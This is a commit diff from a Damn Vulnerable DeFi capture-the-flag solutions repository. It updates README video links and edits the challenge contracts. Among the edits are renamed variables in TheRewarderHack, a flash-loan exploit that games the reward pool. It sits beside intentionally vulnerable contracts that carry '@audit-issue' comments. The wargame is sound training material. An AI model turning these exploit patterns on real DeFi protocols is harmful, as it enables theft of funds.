add defi

README.md

@@ -35,20 +35,20 @@ forge script foundry/script/Deploy.s.sol --fork-url http://localhost:8545 --broa
 
 ## [Damn Vulnerable DeFi](https://www.damnvulnerabledefi.xyz/)
 
-[Damn Vulnerable DeFi](https://www.damnvulnerabledefi.xyz/) is the wargame to learn offensive security of DeFi smart contracts in Ethereum. Featuring flash loans, price oracles, governance, NFTs, DEXs, lending pools, smart contract wallets, timelocks, and more!
+[Damn Vulnerable DeFi](https://www.damnvulnerabledefi.xyz/) is the wargame to learn offensive security of DeFi smart contracts in Ethereum. Featuring flash loans, price oracles, governance, NFTs, DEXs, lending pools, smart contract wallets, timelocks, and more. I also do videos on CTF on [BILIBILI](https://www.bilibili.com/list/3493272831920239?sid=3695249&desc=0&oid=492260627&bvid=BV1wN411t7Ss) and [YouTube](https://www.youtube.com/watch?v=GJwiet8NGS4&list=PLYYL7LUg7BXTTOHhLmh4zjOwdSjhnKtVE&index=1), so feel free to ***SUBSCRIBE*** OR  ***一键三连***.
 
 | Level | Docs | Video | Note |
 | -------- | --- | ------ | ---- |
-| ✅ [1.Unstoppable]() | ...  | ... | ... |
-|  [2.Naive receiver]() | ...  | ... | ... |
-|  [3.Truster]() | ...  | ... | ... |
-|  [4.Side Entrance]() | ...  | ... | ... |
-|  [5.The Rewarder]() | ...  | ... | ... |
-|  [6.Selfie]() | ...  | ... | ... |
-|  [7.Compromised]() | ...  | ... | ... |
-|  [8.Puppet]() | ...  | ... | ... |
-|  [9.Puppet V2]() | ...  | ... | ... |
-|  [10.Free Rider]() | ...  | ... | ... |
+| ✅ [1.Unstoppable](https://www.damnvulnerabledefi.xyz/challenges/unstoppable/) | ...  | [BILIBILI](https://www.bilibili.com/list/3493272831920239?sid=3695249&desc=0&oid=492260627&bvid=BV1wN411t7Ss)、[YouTube](https://www.youtube.com/watch?v=DcH2fm30i_o&list=PLYYL7LUg7BXTTOHhLmh4zjOwdSjhnKtVE&index=2) | ... |
+|  [2.Naive receiver](https://www.damnvulnerabledefi.xyz/challenges/naive-receiver/) | ...  |  [BILIBILI](https://www.bilibili.com/list/3493272831920239?sid=3695249&desc=0&bvid=BV1nN411t7FM&oid=492285883) | ... |
+|  [3.Truster](https://www.damnvulnerabledefi.xyz/challenges/truster/) | ...  | [BILIBILI](https://www.bilibili.com/list/3493272831920239?sid=3695249&desc=0&bvid=BV1iQ4y1s7Vy&oid=704823186) | ... |
+|  [4.Side Entrance](https://www.damnvulnerabledefi.xyz/challenges/side-entrance/)| ...  | [BILIBILI](https://www.bilibili.com/list/3493272831920239?sid=3695249&desc=0&bvid=BV11w411678R&oid=322344180)  | ... |
+|  [5.The Rewarder](https://www.damnvulnerabledefi.xyz/challenges/the-rewarder/) | ... | [BILIBILI](https://www.bilibili.com/list/3493272831920239?sid=3695249&desc=0&bvid=BV1QN411s7bj&oid=492357979)   | ... |
+|  [6.Selfie](https://www.damnvulnerabledefi.xyz/challenges/selfie/) | ...  | [BILIBILI](https://www.bilibili.com/list/3493272831920239?sid=3695249&desc=0&bvid=BV1cN4y1C7Ly&oid=874779438) | ... |
+|  [7.Compromised](https://www.damnvulnerabledefi.xyz/challenges/compromised/) | ...  | [BILIBILI](https://www.bilibili.com/list/3493272831920239?sid=3695249&desc=0&bvid=BV1vu4y1p7nH&oid=917337886) | ... |
+|  [8.Puppet](https://www.damnvulnerabledefi.xyz/challenges/puppet/) | ...  | [BILIBILI](https://www.bilibili.com/list/3493272831920239?sid=3695249&desc=0&bvid=BV1XC4y1G7tj&oid=747301601) | ... |
+|  [9.Puppet V2](https://www.damnvulnerabledefi.xyz/challenges/puppet-v2/) | ...  |[BILIBILI](https://www.bilibili.com/list/3493272831920239?sid=3695249&desc=0&bvid=BV1784y1d7X3&oid=619798854)| ... |
+|  [10.Free Rider](https://www.damnvulnerabledefi.xyz/challenges/free-rider/) | ...  | [BILIBILI]() | ... |
 |  [11.Backdoor]() | ...  | ... | ... |
 |  [12.Climber]() | ...  | ... | ... |
 |  [13.Wallet Mining]() | ...  | ... | ... |

contracts/CTF/Damn-Vulnerable-DeFi/00.Base/DamnValuableTokenSnapshot.sol

@@ -1,5 +1,4 @@
 // SPDX-License-Identifier: MIT
-
 pragma solidity ^0.8.0;
 
 import { ERC20Snapshot, ERC20 } from "@openzeppelin/contracts-v4.7.1/token/ERC20/extensions/ERC20Snapshot.sol";

contracts/CTF/Damn-Vulnerable-DeFi/00.Base/WETH9.sol

@@ -0,0 +1,22 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+// Wrapped Ether https://etherscan.io/token/0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2#code
+interface IWETH {
+    function name() external view returns (string memory);
+    function approve(address guy, uint256 amount) external returns (bool);
+    function totalSupply() external view returns (uint256);
+    function transferFrom(address src, address dst, uint256 amount) external returns (bool);
+    function withdraw(uint256 amount) external;
+    function decimals() external view returns (uint8);
+    function balanceOf(address) external view returns (uint256);
+    function symbol() external view returns (string memory);
+    function transfer(address dst, uint256 amount) external returns (bool);
+    function deposit() external payable;
+    function allowance(address, address) external view returns (uint256);
+
+    event Approval(address indexed src, address indexed guy, uint256 amount);
+    event Transfer(address indexed src, address indexed dst, uint256 amount);
+    event Deposit(address indexed dst, uint256 amount);
+    event Withdrawal(address indexed src, uint256 amount);
+}

contracts/CTF/Damn-Vulnerable-DeFi/04.Side-Entrance.sol

@@ -62,6 +62,10 @@ contract SideEntranceAttack {
 
     function execute() external payable {
         require(msg.sender == address(pool), "msg.sender");
+        /*
+            1. poll ether balance + msg.value
+            2. poll token balance + msg.value
+        */
         pool.deposit{ value: msg.value }();
     }
 

contracts/CTF/Damn-Vulnerable-DeFi/05.The-Rewarder.sol

@@ -4,7 +4,6 @@ pragma solidity ^0.8.0;
 import { OwnableRoles } from "@solady/auth/OwnableRoles.sol";
 import { FixedPointMathLib } from "@solady/utils/FixedPointMathLib.sol";
 import { SafeTransferLib } from "@solady/utils/SafeTransferLib.sol";
-
 import { ERC20 } from "@openzeppelin/contracts-v4.7.1/token/ERC20/ERC20.sol";
 import { Address } from "@openzeppelin/contracts-v4.7.1/utils/Address.sol";
 import { ERC20Snapshot } from "@openzeppelin/contracts-v4.7.1/token/ERC20/extensions/ERC20Snapshot.sol";
@@ -158,6 +157,9 @@ contract TheRewarderPool {
 
         if (amountDeposited > 0 && totalDeposits > 0) {
             // @audit-issue doesn't take into consideration deposited time
+            /// @dev Returns `floor(x * y / d)`.
+            // (amountDeposited /totalDeposits)  * REWARDS
+
             rewards = amountDeposited.mulDiv(REWARDS, totalDeposits);
             if (rewards > 0 && !_hasRetrievedReward(msg.sender)) {
                 // @audit-issue no CEI
@@ -190,30 +192,30 @@ contract TheRewarderPool {
 contract TheRewarderHack {
     FlashLoanerPool private flashLoanPool;
     TheRewarderPool private pool;
-    DamnValuableToken private dvt;
+    DamnValuableToken private liquidityToken;
     RewardToken private reward;
     address internal player;
 
-    constructor(address _flashloan, address _pool, address _dvt, address _reward) {
+    constructor(address _flashloan, address _pool, address _liquidityToken, address _reward) {
         flashLoanPool = FlashLoanerPool(_flashloan);
         pool = TheRewarderPool(_pool);
-        dvt = DamnValuableToken(_dvt);
+        liquidityToken = DamnValuableToken(_liquidityToken);
         reward = RewardToken(_reward);
         player = msg.sender;
     }
 
     function attack() external {
-        flashLoanPool.flashLoan(dvt.balanceOf(address(flashLoanPool)));
+        flashLoanPool.flashLoan(liquidityToken.balanceOf(address(flashLoanPool)));
     }
 
     function receiveFlashLoan(uint256 amount) external {
-        dvt.approve(address(pool), amount);
+        liquidityToken.approve(address(pool), amount);
         // deposit liquidity token get reward token
         pool.deposit(amount);
         // withdraw liquidity token
         pool.withdraw(amount);
         // repay to flashloan
-        dvt.transfer(address(flashLoanPool), amount);
+        liquidityToken.transfer(address(flashLoanPool), amount);
         uint256 rewardBalance = reward.balanceOf(address(this));
         reward.transfer(player, rewardBalance);
     }

contracts/CTF/Damn-Vulnerable-DeFi/07.Compromised.sol

@@ -1,10 +1,10 @@
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 
-import "@solady/utils/LibSort.sol";
-import "@openzeppelin/contracts-v4.7.1/utils/Address.sol";
-import "@openzeppelin/contracts-v4.7.1/security/ReentrancyGuard.sol";
-import "@openzeppelin/contracts-v4.7.1/access/AccessControlEnumerable.sol";
+import { LibSort } from "@solady/utils/LibSort.sol";
+import { Address } from "@openzeppelin/contracts-v4.7.1/utils/Address.sol";
+import { ReentrancyGuard } from "@openzeppelin/contracts-v4.7.1/security/ReentrancyGuard.sol";
+import { AccessControlEnumerable } from "@openzeppelin/contracts-v4.7.1/access/AccessControlEnumerable.sol";
 import { DamnValuableNFT } from "@contracts/CTF/Damn-Vulnerable-DeFi/00.Base/DamnValuableNFT.sol";
 
 contract Exchange is ReentrancyGuard {